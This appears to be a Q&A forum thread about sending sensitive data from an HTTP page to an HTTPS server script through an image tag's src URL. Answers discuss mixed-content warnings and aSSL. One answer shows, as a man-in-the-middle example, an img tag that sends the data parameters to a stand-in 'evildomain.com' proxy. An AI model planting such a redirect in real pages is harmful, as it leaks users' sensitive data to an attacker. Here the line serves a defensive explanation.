views:

198

answers:

4

I have a server script that I need to pass data to from the browser without reloading the page (aka ajax). The data is sensitive so should be sent via https. The page however is on the http layer. Because of same domain/protocol restriction, the browser doesn't allow this.

I'm thinking of cheating the system a bit by dynamically creating image tags and call the script using the src tag such as:

<img src="https://mydomain.com/mysecurescript/&amp;data=to&amp;pass=to&amp;my=script" />

I'd like to know if this will indeed be properly encrypted.

+1  A: 

Yes and no.

The server address portion of the URL is obviously not encrypted since it is used to set up the connection.

Everything else is encrypted while being sent via HTTPS connection. But anyone viewing the source will obviously be able to see the data being posted.

Zak
A: 

It also bears mentioning that some browsers won't display (or will warn the user before displaying) mixed mode (http vs. https) HTML pages. In some cases, this may not work because the user selects to block it.

Matthew Scharley
+3  A: 

The problem with this is if the page itself is only HTTP, then you're susceptible to a man in the middle attack. An attacker can just modify the script in the page sent over HTTP so that it instead uses:

<img src="http://evildomain.com/evilproxyscript/&amp;data=to&amp;pass=to&amp;my=script" />

The user will be none-the-wiser. To get around this you really need to serve the page over HTTPS too - which neatly solves your other problem at the same time.

(This is exactly the same reason why login forms should be on HTTPS pages, rather than just the form action being HTTPS).

caf
If you require SSL encryption for login, your whole site should be in https IMO. You have the facility already, you may as well use it.
Matthew Scharley
unless performance/caching is an issue, which it often can be.
Colin Coghill
A: 

A possible alternative to the image technique (the drawback of which, as mentioned by others, is that mixed mode content is not treated kindly by some browsers) would by aSSL.

Either method will result in encryption happening, and both are still vulnerable to man in the middle attacks.

ShZ